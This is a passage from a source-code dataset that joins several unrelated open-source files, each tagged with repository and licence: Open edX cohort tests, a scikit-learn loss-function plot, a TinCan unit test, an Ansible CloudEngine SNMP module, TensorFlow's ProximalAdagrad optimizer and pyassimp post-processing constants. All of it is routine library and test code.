self.assertEquals(cohorts.get_cohort(user2, course.id).name, "AutoGroup", "user2 should be auto-cohorted")
def test_cohorting_with_migrations_done(self):
"""
Verifies that cohort config changes on studio/moduletore side will
not be reflected on lms after the migrations are done.
"""
course = modulestore().get_course(self.toy_course_key)
user1 = UserFactory(username="test", email="a@b.com")
user2 = UserFactory(username="test2", email="a2@b.com")
# Add an auto_cohort_group to the course...
config_course_cohorts(
course,
is_cohorted=True,
auto_cohorts=["AutoGroup"]
)
self.assertEquals(cohorts.get_cohort(user1, course.id).name, "AutoGroup", "user1 should be auto-cohorted")
# Now set the auto_cohort_group to something different
# This will have no effect on lms side as we are already done with migrations
config_course_cohorts_legacy(
course,
discussions=[],
cohorted=True,
auto_cohort_groups=["OtherGroup"]
)
self.assertEquals(
cohorts.get_cohort(user2, course.id).name, "AutoGroup", "user2 should be assigned to AutoGroups"
)
self.assertEquals(
cohorts.get_cohort(user1, course.id).name, "AutoGroup", "user1 should still be in originally placed cohort"
)
def test_cohorting_with_no_auto_cohorts(self):
"""
Make sure cohorts.get_cohort() does the right thing.
If there are not auto cohorts then a user should be assigned to Default Cohort Group.
Also verifies that cohort config changes on studio/moduletore side will
not be reflected on lms after the migrations are done.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertFalse(cohorts.is_course_cohorted(course.id))
user1 = UserFactory(username="test", email="a@b.com")
user2 = UserFactory(username="test2", email="a2@b.com")
# Make the auto_cohort_group list empty
config_course_cohorts(
course,
is_cohorted=True,
auto_cohorts=[]
)
self.assertEquals(
cohorts.get_cohort(user1, course.id).id,
cohorts.get_cohort_by_name(course.id, cohorts.DEFAULT_COHORT_NAME).id,
"No groups->default cohort for user1"
)
# Add an auto_cohort_group to the course
# This will have no effect on lms side as we are already done with migrations
config_course_cohorts_legacy(
course,
discussions=[],
cohorted=True,
auto_cohort_groups=["AutoGroup"]
)
self.assertEquals(
cohorts.get_cohort(user1, course.id).name,
cohorts.get_cohort_by_name(course.id, cohorts.DEFAULT_COHORT_NAME).name,
"user1 should still be in the default cohort"
)
self.assertEquals(
cohorts.get_cohort(user2, course.id).id,
cohorts.get_cohort_by_name(course.id, cohorts.DEFAULT_COHORT_NAME).id,
"No groups->default cohort for user2"
)
def test_auto_cohorting_randomization(self):
"""
Make sure cohorts.get_cohort() randomizes properly.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertFalse(cohorts.is_course_cohorted(course.id))
groups = ["group_{0}".format(n) for n in range(5)]
config_course_cohorts(
course, is_cohorted=True, auto_cohorts=groups
)
# Assign 100 users to cohorts
for i in range(100):
user = UserFactory(
username="test_{0}".format(i),
email="a@b{0}.com".format(i)
)
cohorts.get_cohort(user, course.id)
# Now make sure that the assignment was at least vaguely random:
# each cohort should have at least 1, and fewer than 50 students.
# (with 5 groups, probability of 0 users in any group is about
# .8**100= 2.0e-10)
for cohort_name in groups:
cohort = cohorts.get_cohort_by_name(course.id, cohort_name)
num_users = cohort.users.count()
self.assertGreater(num_users, 1)
self.assertLess(num_users, 50)
def test_get_course_cohorts_noop(self):
"""
Tests get_course_cohorts returns an empty list when no cohorts exist.
"""
course = modulestore().get_course(self.toy_course_key)
config_course_cohorts(course, is_cohorted=True)
self.assertEqual([], cohorts.get_course_cohorts(course))
def test_get_course_cohorts(self):
"""
Tests that get_course_cohorts returns all cohorts, including auto cohorts.
"""
course = modulestore().get_course(self.toy_course_key)
config_course_cohorts(
course,
is_cohorted=True,
auto_cohorts=["AutoGroup1", "AutoGroup2"]
)
# add manual cohorts to course 1
CohortFactory(course_id=course.id, name="ManualCohort")
CohortFactory(course_id=course.id, name="ManualCohort2")
cohort_set = {c.name for c in cohorts.get_course_cohorts(course)}
self.assertEqual(cohort_set, {"AutoGroup1", "AutoGroup2", "ManualCohort", "ManualCohort2"})
def test_get_cohort_names(self):
course = modulestore().get_course(self.toy_course_key)
cohort1 = CohortFactory(course_id=course.id, name="Cohort1")
cohort2 = CohortFactory(course_id=course.id, name="Cohort2")
self.assertEqual(
cohorts.get_cohort_names(course),
{cohort1.id: cohort1.name, cohort2.id: cohort2.name}
)
def test_get_cohorted_commentables(self):
"""
Make sure cohorts.get_cohorted_commentables() correctly returns a list of strings representing cohorted
commentables. Also verify that we can't get the cohorted commentables from a course which does not exist.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertEqual(cohorts.get_cohorted_commentables(course.id), set())
config_course_cohorts(course, is_cohorted=True)
self.assertEqual(cohorts.get_cohorted_commentables(course.id), set())
config_course_cohorts(
course,
is_cohorted=True,
discussion_topics=["General", "Feedback"],
cohorted_discussions=["Feedback"]
)
self.assertItemsEqual(
cohorts.get_cohorted_commentables(course.id),
set([topic_name_to_id(course, "Feedback")])
)
config_course_cohorts(
course,
is_cohorted=True,
discussion_topics=["General", "Feedback"],
cohorted_discussions=["General", "Feedback"]
)
self.assertItemsEqual(
cohorts.get_cohorted_commentables(course.id),
set([topic_name_to_id(course, "General"), topic_name_to_id(course, "Feedback")])
)
self.assertRaises(
Http404,
lambda: cohorts.get_cohorted_commentables(SlashSeparatedCourseKey("course", "does_not", "exist"))
)
def test_get_cohort_by_name(self):
"""
Make sure cohorts.get_cohort_by_name() properly finds a cohort by name for a given course. Also verify that it
raises an error when the cohort is not found.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertRaises(
CourseUserGroup.DoesNotExist,
lambda: cohorts.get_cohort_by_name(course.id, "CohortDoesNotExist")
)
cohort = CohortFactory(course_id=course.id, name="MyCohort")
self.assertEqual(cohorts.get_cohort_by_name(course.id, "MyCohort"), cohort)
self.assertRaises(
CourseUserGroup.DoesNotExist,
lambda: cohorts.get_cohort_by_name(SlashSeparatedCourseKey("course", "does_not", "exist"), cohort)
)
def test_get_cohort_by_id(self):
"""
Make sure cohorts.get_cohort_by_id() properly finds a cohort by id for a given
course.
"""
course = modulestore().get_course(self.toy_course_key)
cohort = CohortFactory(course_id=course.id, name="MyCohort")
self.assertEqual(cohorts.get_cohort_by_id(course.id, cohort.id), cohort)
cohort.delete()
self.assertRaises(
CourseUserGroup.DoesNotExist,
lambda: cohorts.get_cohort_by_id(course.id, cohort.id)
)
@patch("openedx.core.djangoapps.course_groups.cohorts.tracker")
def test_add_cohort(self, mock_tracker):
"""
Make sure cohorts.add_cohort() properly adds a cohort to a course and handles
errors.
"""
assignment_type = CourseCohort.RANDOM
course = modulestore().get_course(self.toy_course_key)
added_cohort = cohorts.add_cohort(course.id, "My Cohort", assignment_type)
mock_tracker.emit.assert_any_call(
"edx.cohort.creation_requested",
{"cohort_name": added_cohort.name, "cohort_id": added_cohort.id}
)
self.assertEqual(added_cohort.name, "My Cohort")
self.assertRaises(
ValueError,
lambda: cohorts.add_cohort(course.id, "My Cohort", assignment_type)
)
does_not_exist_course_key = SlashSeparatedCourseKey("course", "does_not", "exist")
self.assertRaises(
ValueError,
lambda: cohorts.add_cohort(does_not_exist_course_key, "My Cohort", assignment_type)
)
@patch("openedx.core.djangoapps.course_groups.cohorts.tracker")
def test_add_user_to_cohort(self, mock_tracker):
"""
Make sure cohorts.add_user_to_cohort() properly adds a user to a cohort and
handles errors.
"""
course_user = UserFactory(username="Username", email="a@b.com")
UserFactory(username="RandomUsername", email="b@b.com")
course = modulestore().get_course(self.toy_course_key)
CourseEnrollment.enroll(course_user, self.toy_course_key)
first_cohort = CohortFactory(course_id=course.id, name="FirstCohort")
second_cohort = CohortFactory(course_id=course.id, name="SecondCohort")
# Success cases
# We shouldn't get back a previous cohort, since the user wasn't in one
self.assertEqual(
cohorts.add_user_to_cohort(first_cohort, "Username"),
(course_user, None)
)
mock_tracker.emit.assert_any_call(
"edx.cohort.user_add_requested",
{
"user_id": course_user.id,
"cohort_id": first_cohort.id,
"cohort_name": first_cohort.name,
"previous_cohort_id": None,
"previous_cohort_name": None,
}
)
# Should get (user, previous_cohort_name) when moved from one cohort to
# another
self.assertEqual(
cohorts.add_user_to_cohort(second_cohort, "Username"),
(course_user, "FirstCohort")
)
mock_tracker.emit.assert_any_call(
"edx.cohort.user_add_requested",
{
"user_id": course_user.id,
"cohort_id": second_cohort.id,
"cohort_name": second_cohort.name,
"previous_cohort_id": first_cohort.id,
"previous_cohort_name": first_cohort.name,
}
)
# Error cases
# Should get ValueError if user already in cohort
self.assertRaises(
ValueError,
lambda: cohorts.add_user_to_cohort(second_cohort, "Username")
)
# UserDoesNotExist if user truly does not exist
self.assertRaises(
User.DoesNotExist,
lambda: cohorts.add_user_to_cohort(first_cohort, "non_existent_username")
)
@patch("openedx.core.djangoapps.course_groups.cohorts.tracker")
def add_user_to_cohorts_race_condition(self, mock_tracker):
"""
Makes use of before_after to force a race condition, in order to
confirm handling of such conditions is done correctly.
"""
course_user = UserFactory(username="Username", email="a@b.com")
course = modulestore().get_course(self.toy_course_key)
CourseEnrollment.enroll(course_user, self.toy_course_key)
first_cohort = CohortFactory(course_id=course.id, name="FirstCohort")
second_cohort = CohortFactory(course_id=course.id, name="SecondCohort")
# This before_after contextmanager allows for reliable reproduction of a race condition.
# It will break before the first save() call creates an entry, and then run add_user_to_cohort again.
# Because this second call will write before control is returned, the first call will be writing stale data.
# This test confirms that the first add_user_to_cohort call can handle this stale read condition properly.
# Proper handling is defined as treating calls as sequential, with write time deciding the order.
with before_after.before_after(
'django.db.models.Model.save',
after_ftn=cohorts.add_user_to_cohort(second_cohort, course_user.username),
autospec=True
):
# This method will read, then break, then try to write stale data.
# It should fail at that, then retry with refreshed data
cohorts.add_user_to_cohort(first_cohort, course_user.username)
mock_tracker.emit.assert_any_call(
"edx.cohort.user_add_requested",
{
"user_id": course_user.id,
"cohort_id": first_cohort.id,
"cohort_name": first_cohort.name,
"previous_cohort_id": second_cohort.id,
"previous_cohort_name": second_cohort.name,
}
)
# Note that the following get() will fail with MultipleObjectsReturned if race condition is not handled.
self.assertEqual(first_cohort.users.get(), course_user)
def test_get_course_cohort_settings(self):
"""
Test that cohorts.get_course_cohort_settings is working as expected.
"""
course = modulestore().get_course(self.toy_course_key)
course_cohort_settings = cohorts.get_course_cohort_settings(course.id)
self.assertFalse(course_cohort_settings.is_cohorted)
self.assertEqual(course_cohort_settings.cohorted_discussions, [])
self.assertTrue(course_cohort_settings.always_cohort_inline_discussions)
def test_update_course_cohort_settings(self):
"""
Test that cohorts.set_course_cohort_settings is working as expected.
"""
course = modulestore().get_course(self.toy_course_key)
CourseCohortSettingsFactory(course_id=course.id)
cohorts.set_course_cohort_settings(
course.id,
is_cohorted=False,
cohorted_discussions=['topic a id', 'topic b id'],
always_cohort_inline_discussions=False
)
course_cohort_settings = cohorts.get_course_cohort_settings(course.id)
self.assertFalse(course_cohort_settings.is_cohorted)
self.assertEqual(course_cohort_settings.cohorted_discussions, ['topic a id', 'topic b id'])
self.assertFalse(course_cohort_settings.always_cohort_inline_discussions)
def test_update_course_cohort_settings_with_invalid_data_type(self):
"""
Test that cohorts.set_course_cohort_settings raises exception if fields have incorrect data type.
"""
course = modulestore().get_course(self.toy_course_key)
CourseCohortSettingsFactory(course_id=course.id)
exception_msg_tpl = "Incorrect field type for `{}`. Type must be `{}`"
fields = [
{'name': 'is_cohorted', 'type': bool},
{'name': 'always_cohort_inline_discussions', 'type': bool},
{'name': 'cohorted_discussions', 'type': list}
]
for field in fields:
with self.assertRaises(ValueError) as value_error:
cohorts.set_course_cohort_settings(course.id, **{field['name']: ''})
self.assertEqual(
value_error.exception.message,
exception_msg_tpl.format(field['name'], field['type'].__name__)
)
@attr('shard_2')
@ddt.ddt
class TestCohortsAndPartitionGroups(ModuleStoreTestCase):
"""
Test Cohorts and Partitions Groups.
"""
MODULESTORE = TEST_DATA_MIXED_MODULESTORE
def setUp(self):
"""
Regenerate a test course and cohorts for each test
"""
super(TestCohortsAndPartitionGroups, self).setUp()
self.test_course_key = ToyCourseFactory.create().id
self.course = modulestore().get_course(self.test_course_key)
self.first_cohort = CohortFactory(course_id=self.course.id, name="FirstCohort")
self.second_cohort = CohortFactory(course_id=self.course.id, name="SecondCohort")
self.partition_id = 1
self.group1_id = 10
self.group2_id = 20
def _link_cohort_partition_group(self, cohort, partition_id, group_id):
"""
Utility to create cohort -> partition group assignments in the database.
"""
link = CourseUserGroupPartitionGroup(
course_user_group=cohort,
partition_id=partition_id,
group_id=group_id,
)
link.save()
return link
def test_get_group_info_for_cohort(self):
"""
Basic test of the partition_group_info accessor function
"""
# api should return nothing for an unmapped cohort
self.assertEqual(
cohorts.get_group_info_for_cohort(self.first_cohort),
(None, None),
)
# create a link for the cohort in the db
link = self._link_cohort_partition_group(
self.first_cohort,
self.partition_id,
self.group1_id
)
# api should return the specified partition and group
self.assertEqual(
cohorts.get_group_info_for_cohort(self.first_cohort),
(self.group1_id, self.partition_id)
)
# delete the link in the db
link.delete()
# api should return nothing again
self.assertEqual(
cohorts.get_group_info_for_cohort(self.first_cohort),
(None, None),
)
@ddt.data(
(True, 1),
(False, 3),
)
@ddt.unpack
def test_get_group_info_for_cohort_queries(self, use_cached, num_sql_queries):
"""
Basic test of the partition_group_info accessor function
"""
# create a link for the cohort in the db
self._link_cohort_partition_group(
self.first_cohort,
self.partition_id,
self.group1_id
)
with self.assertNumQueries(num_sql_queries):
for __ in range(3):
self.assertIsNotNone(cohorts.get_group_info_for_cohort(self.first_cohort, use_cached=use_cached))
def test_multiple_cohorts(self):
"""
Test that multiple cohorts can be linked to the same partition group
"""
self._link_cohort_partition_group(
self.first_cohort,
self.partition_id,
self.group1_id,
)
self._link_cohort_partition_group(
self.second_cohort,
self.partition_id,
self.group1_id,
)
self.assertEqual(
cohorts.get_group_info_for_cohort(self.first_cohort),
(self.group1_id, self.partition_id),
)
self.assertEqual(
cohorts.get_group_info_for_cohort(self.second_cohort),
cohorts.get_group_info_for_cohort(self.first_cohort),
)
def test_multiple_partition_groups(self):
"""
Test that a cohort cannot be mapped to more than one partition group
"""
self._link_cohort_partition_group(
self.first_cohort,
self.partition_id,
self.group1_id,
)
with self.assertRaises(IntegrityError):
self._link_cohort_partition_group(
self.first_cohort,
self.partition_id,
self.group2_id,
)
def test_delete_cascade(self):
"""
Test that cohort -> partition group links are automatically deleted
when their parent cohort is deleted.
"""
self._link_cohort_partition_group(
self.first_cohort,
self.partition_id,
self.group1_id
)
self.assertEqual(
cohorts.get_group_info_for_cohort(self.first_cohort),
(self.group1_id, self.partition_id)
)
# delete the link
self.first_cohort.delete()
# api should return nothing at that point
self.assertEqual(
cohorts.get_group_info_for_cohort(self.first_cohort),
(None, None),
)
# link should no longer exist because of delete cascade
with self.assertRaises(CourseUserGroupPartitionGroup.DoesNotExist):
CourseUserGroupPartitionGroup.objects.get(
course_user_group_id=self.first_cohort.id
)
| agpl-3.0 |
kashif/scikit-learn | examples/linear_model/plot_sgd_loss_functions.py | 73 | 1232 | """
==========================
SGD: convex loss functions
==========================
A plot that compares the various convex loss functions supported by
:class:`sklearn.linear_model.SGDClassifier` .
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
def modified_huber_loss(y_true, y_pred):
z = y_pred * y_true
loss = -4 * z
loss[z >= -1] = (1 - z[z >= -1]) ** 2
loss[z >= 1.] = 0
return loss
xmin, xmax = -4, 4
xx = np.linspace(xmin, xmax, 100)
lw = 2
plt.plot([xmin, 0, 0, xmax], [1, 1, 0, 0], color='gold', lw=lw,
label="Zero-one loss")
plt.plot(xx, np.where(xx < 1, 1 - xx, 0), color='teal', lw=lw,
label="Hinge loss")
plt.plot(xx, -np.minimum(xx, 0), color='yellowgreen', lw=lw,
label="Perceptron loss")
plt.plot(xx, np.log2(1 + np.exp(-xx)), color='cornflowerblue', lw=lw,
label="Log loss")
plt.plot(xx, np.where(xx < 1, 1 - xx, 0) ** 2, color='orange', lw=lw,
label="Squared hinge loss")
plt.plot(xx, modified_huber_loss(xx, 1), color='darkorchid', lw=lw,
linestyle='--', label="Modified Huber loss")
plt.ylim((0, 8))
plt.legend(loc="upper right")
plt.xlabel(r"Decision function $f(x)$")
plt.ylabel("$L(y, f(x))$")
plt.show()
| bsd-3-clause |
brianjmiller/TinCanPython | test/typedlist_test.py | 2 | 1028 | # Copyright 2014 Rustici Software
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
if __name__ == '__main__':
from main import setup_tincan_path
setup_tincan_path()
from tincan import TypedList
class TypedListTest(unittest.TestCase):
def test_Init(self):
with self.assertRaises(ValueError):
TypedList()
if __name__ == "__main__":
suite = unittest.TestLoader().loadTestsFromTestCase(TypedListTest)
unittest.TextTestRunner(verbosity=2).run(suite)
| apache-2.0 |
lmazuel/ansible | lib/ansible/modules/network/cloudengine/ce_snmp_location.py | 39 | 6774 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.0'}
DOCUMENTATION = '''
---
module: ce_snmp_location
version_added: "2.4"
short_description: Manages SNMP location configuration on HUAWEI CloudEngine switches.
description:
- Manages SNMP location configurations on HUAWEI CloudEngine switches.
author:
- wangdezhuang (@CloudEngine-Ansible)
options:
location:
description:
- Location information.
required: true
default: null
state:
description:
- Manage the state of the resource.
required: false
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- name: CloudEngine snmp location test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Config SNMP location"
ce_snmp_location:
state: present
location: nanjing China
provider: "{{ cli }}"
- name: "Remove SNMP location"
ce_snmp_location:
state: absent
location: nanjing China
provider: "{{ cli }}"
'''
RETURN = '''
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"location": "nanjing China",
"state": "present"}
existing:
description: k/v pairs of existing aaa server
returned: always
type: dict
sample: {}
end_state:
description: k/v pairs of aaa params after module execution
returned: always
type: dict
sample: {"location": "nanjing China"}
updates:
description: command sent to the device
returned: always
type: list
sample: ["snmp-agent sys-info location nanjing China"]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ce import get_config, load_config, ce_argument_spec
class SnmpLocation(object):
""" Manages SNMP location configuration """
def __init__(self, **kwargs):
""" Class init """
# module
argument_spec = kwargs["argument_spec"]
self.spec = argument_spec
self.module = AnsibleModule(argument_spec=self.spec, supports_check_mode=True)
# config
self.cur_cfg = dict()
# module args
self.state = self.module.params['state']
self.location = self.module.params['location']
# state
self.changed = False
self.updates_cmd = list()
self.results = dict()
self.proposed = dict()
self.existing = dict()
self.end_state = dict()
def check_args(self):
""" Check invalid args """
if self.location:
if len(self.location) > 255 or len(self.location) < 1:
self.module.fail_json(
msg='Error: The len of location %s is out of [1 - 255].' % self.location)
else:
self.module.fail_json(
msg='Error: The len of location is 0.')
def get_proposed(self):
""" Get proposed state """
self.proposed["state"] = self.state
if self.location:
self.proposed["location"] = self.location
def get_existing(self):
""" Get existing state """
tmp_cfg = self.cli_get_config()
if tmp_cfg:
temp_data = tmp_cfg.split(r"location ")
self.cur_cfg["location"] = temp_data[1]
self.existing["location"] = temp_data[1]
def get_end_state(self):
""" Get end state """
tmp_cfg = self.cli_get_config()
if tmp_cfg:
temp_data = tmp_cfg.split(r"location ")
self.end_state["location"] = temp_data[1]
def cli_load_config(self, commands):
""" Load config by cli """
if not self.module.check_mode:
load_config(self.module, commands)
def cli_get_config(self):
""" Get config by cli """
regular = "| include snmp | include location"
flags = list()
flags.append(regular)
tmp_cfg = get_config(self.module, flags)
return tmp_cfg
def set_config(self):
""" Set configure by cli """
cmd = "snmp-agent sys-info location %s" % self.location
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def undo_config(self):
""" Undo configure by cli """
cmd = "undo snmp-agent sys-info location"
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def work(self):
""" Main work function """
self.check_args()
self.get_proposed()
self.get_existing()
if self.state == "present":
if "location" in self.cur_cfg.keys() and self.location == self.cur_cfg["location"]:
pass
else:
self.set_config()
else:
if "location" in self.cur_cfg.keys() and self.location == self.cur_cfg["location"]:
self.undo_config()
self.get_end_state()
self.results['changed'] = self.changed
self.results['proposed'] = self.proposed
self.results['existing'] = self.existing
self.results['end_state'] = self.end_state
self.results['updates'] = self.updates_cmd
self.module.exit_json(**self.results)
def main():
""" Module main """
argument_spec = dict(
state=dict(choices=['present', 'absent'], default='present'),
location=dict(type='str', required=True)
)
argument_spec.update(ce_argument_spec)
module = SnmpLocation(argument_spec=argument_spec)
module.work()
if __name__ == '__main__':
main()
| gpl-3.0 |
aam-at/tensorflow | tensorflow/python/training/proximal_adagrad.py | 21 | 5744 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""ProximalAdagrad for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.ops import math_ops
from tensorflow.python.training import optimizer
from tensorflow.python.training import training_ops
from tensorflow.python.util.tf_export import tf_export
@tf_export(v1=["train.ProximalAdagradOptimizer"])
class ProximalAdagradOptimizer(optimizer.Optimizer):
# pylint: disable=line-too-long
"""Optimizer that implements the Proximal Adagrad algorithm.
References:
Adaptive Subgradient Methods for Online Learning and Stochastic Optimization:
[Duchi et al., 2011](http://jmlr.org/papers/v12/duchi11a.html)
([pdf](http://www.jmlr.org/papers/volume12/duchi11a/duchi11a.pdf))
Efficient Learning using Forward-Backward Splitting:
[Duchi et al., 2009](http://papers.nips.cc/paper/3793-efficient-learning-using-forward-backward-splitting)
([pdf](http://papers.nips.cc/paper/3793-efficient-learning-using-forward-backward-splitting.pdf))
"""
def __init__(self, learning_rate, initial_accumulator_value=0.1,
l1_regularization_strength=0.0, l2_regularization_strength=0.0,
use_locking=False, name="ProximalAdagrad"):
"""Construct a new ProximalAdagrad optimizer.
Args:
learning_rate: A `Tensor` or a floating point value. The learning rate.
initial_accumulator_value: A floating point value.
Starting value for the accumulators, must be positive.
l1_regularization_strength: A float value, must be greater than or
equal to zero.
l2_regularization_strength: A float value, must be greater than or
equal to zero.
use_locking: If `True` use locks for update operations.
name: Optional name prefix for the operations created when applying
gradients. Defaults to "Adagrad".
Raises:
ValueError: If the `initial_accumulator_value` is invalid.
"""
if initial_accumulator_value <= 0.0:
raise ValueError("initial_accumulator_value must be positive: %s" %
initial_accumulator_value)
super(ProximalAdagradOptimizer, self).__init__(use_locking, name)
self._learning_rate = learning_rate
self._initial_accumulator_value = initial_accumulator_value
self._l1_regularization_strength = l1_regularization_strength
self._l2_regularization_strength = l2_regularization_strength
# Created in Initialize.
self._l1_regularization_strength_tensor = None
self._l2_regularization_strength_tensor = None
self._learning_rate_tensor = None
def _create_slots(self, var_list):
for v in var_list:
with ops.colocate_with(v):
val = constant_op.constant(self._initial_accumulator_value,
shape=v.get_shape(),
dtype=v.dtype.base_dtype)
self._get_or_make_slot(v, val, "accumulator", self._name)
def _prepare(self):
self._learning_rate_tensor = ops.convert_to_tensor(self._learning_rate,
name="learning_rate")
self._l1_regularization_strength_tensor = ops.convert_to_tensor(
self._l1_regularization_strength,
name="l1_regularization_strength")
self._l2_regularization_strength_tensor = ops.convert_to_tensor(
self._l2_regularization_strength,
name="l2_regularization_strength")
def _apply_dense(self, grad, var):
acc = self.get_slot(var, "accumulator")
return training_ops.apply_proximal_adagrad(
var, acc, self._learning_rate_tensor,
self._l1_regularization_strength_tensor,
self._l2_regularization_strength_tensor,
grad, use_locking=self._use_locking)
def _resource_apply_dense(self, grad, var):
acc = self.get_slot(var, "accumulator")
return training_ops.resource_apply_proximal_adagrad(
var.handle, acc.handle, self._learning_rate_tensor,
self._l1_regularization_strength_tensor,
self._l2_regularization_strength_tensor,
grad, use_locking=self._use_locking)
def _apply_sparse(self, grad, var):
acc = self.get_slot(var, "accumulator")
return training_ops.sparse_apply_proximal_adagrad(
var, acc, self._learning_rate_tensor,
self._l1_regularization_strength_tensor,
self._l2_regularization_strength_tensor,
grad.values, grad.indices,
use_locking=self._use_locking)
def _resource_apply_sparse(self, grad, var, indices):
acc = self.get_slot(var, "accumulator")
return training_ops.resource_sparse_apply_proximal_adagrad(
var.handle, acc.handle,
math_ops.cast(self._learning_rate_tensor, grad.dtype),
math_ops.cast(self._l1_regularization_strength_tensor, grad.dtype),
math_ops.cast(self._l2_regularization_strength_tensor, grad.dtype),
grad, indices,
use_locking=self._use_locking)
| apache-2.0 |
daviddeng/azrael | pyassimp/postprocess.py | 47 | 23509 | # <hr>Calculates the tangents and bitangents for the imported meshes.
#
# Does nothing if a mesh does not have normals. You might want this post
# processing step to be executed if you plan to use tangent space calculations
# such as normal mapping applied to the meshes. There's a config setting,
# <tt>#AI_CONFIG_PP_CT_MAX_SMOOTHING_ANGLE<tt>, which allows you to specify
# a maximum smoothing angle for the algorithm. However, usually you'll
# want to leave it at the default value.
#
aiProcess_CalcTangentSpace = 0x1
## <hr>Identifies and joins identical vertex data sets within all
# imported meshes.
#
# After this step is run, each mesh contains unique vertices,
# so a vertex may be used by multiple faces. You usually want
# to use this post processing step. If your application deals with
# indexed geometry, this step is compulsory or you'll just waste rendering
# time. <b>If this flag is not specified<b>, no vertices are referenced by
# more than one face and <b>no index buffer is required<b> for rendering.
#
aiProcess_JoinIdenticalVertices = 0x2
## <hr>Converts all the imported data to a left-handed coordinate space.
#
# By default the data is returned in a right-handed coordinate space (which
# OpenGL prefers). In this space, +X points to the right,
# +Z points towards the viewer, and +Y points upwards. In the DirectX
# coordinate space +X points to the right, +Y points upwards, and +Z points
# away from the viewer.
#
# You'll probably want to consider this flag if you use Direct3D for
# rendering. The #aiProcess_ConvertToLeftHanded flag supersedes this
# setting and bundles all conversions typically required for D3D-based
# applications.
#
aiProcess_MakeLeftHanded = 0x4
## <hr>Triangulates all faces of all meshes.
#
# By default the imported mesh data might contain faces with more than 3
# indices. For rendering you'll usually want all faces to be triangles.
# This post processing step splits up faces with more than 3 indices into
# triangles. Line and point primitives are #not# modified! If you want
# 'triangles only' with no other kinds of primitives, try the following
# solution:
# <ul>
# <li>Specify both #aiProcess_Triangulate and #aiProcess_SortByPType <li>
# <li>Ignore all point and line meshes when you process assimp's output<li>
# <ul>
#
aiProcess_Triangulate = 0x8
## <hr>Removes some parts of the data structure (animations, materials,
# light sources, cameras, textures, vertex components).
#
# The components to be removed are specified in a separate
# configuration option, <tt>#AI_CONFIG_PP_RVC_FLAGS<tt>. This is quite useful
# if you don't need all parts of the output structure. Vertex colors
# are rarely used today for example... Calling this step to remove unneeded
# data from the pipeline as early as possible results in increased
# performance and a more optimized output data structure.
# This step is also useful if you want to force Assimp to recompute
# normals or tangents. The corresponding steps don't recompute them if
# they're already there (loaded from the source asset). By using this
# step you can make sure they are NOT there.
#
# This flag is a poor one, mainly because its purpose is usually
# misunderstood. Consider the following case: a 3D model has been exported
# from a CAD app, and it has per-face vertex colors. Vertex positions can't be
# shared, thus the #aiProcess_JoinIdenticalVertices step fails to
# optimize the data because of these nasty little vertex colors.
# Most apps don't even process them, so it's all for nothing. By using
# this step, unneeded components are excluded as early as possible
# thus opening more room for internal optimizations.
#
aiProcess_RemoveComponent = 0x10
## <hr>Generates normals for all faces of all meshes.
#
# This is ignored if normals are already there at the time this flag
# is evaluated. Model importers try to load them from the source file, so
# they're usually already there. Face normals are shared between all points
# of a single face, so a single point can have multiple normals, which
# forces the library to duplicate vertices in some cases.
# #aiProcess_JoinIdenticalVertices is #senseless# then.
#
# This flag may not be specified together with #aiProcess_GenSmoothNormals.
#
aiProcess_GenNormals = 0x20
## <hr>Generates smooth normals for all vertices in the mesh.
#
# This is ignored if normals are already there at the time this flag
# is evaluated. Model importers try to load them from the source file, so
# they're usually already there.
#
# This flag may not be specified together with
# #aiProcess_GenNormals. There's a configuration option,
# <tt>#AI_CONFIG_PP_GSN_MAX_SMOOTHING_ANGLE<tt> which allows you to specify
# an angle maximum for the normal smoothing algorithm. Normals exceeding
# this limit are not smoothed, resulting in a 'hard' seam between two faces.
# Using a decent angle here (e.g. 80 degrees) results in very good visual
# appearance.
#
aiProcess_GenSmoothNormals = 0x40
## <hr>Splits large meshes into smaller sub-meshes.
#
# This is quite useful for real-time rendering, where the number of triangles
# which can be maximally processed in a single draw-call is limited
# by the video driverhardware. The maximum vertex buffer is usually limited
# too. Both requirements can be met with this step: you may specify both a
# triangle and vertex limit for a single mesh.
#
# The split limits can (and should!) be set through the
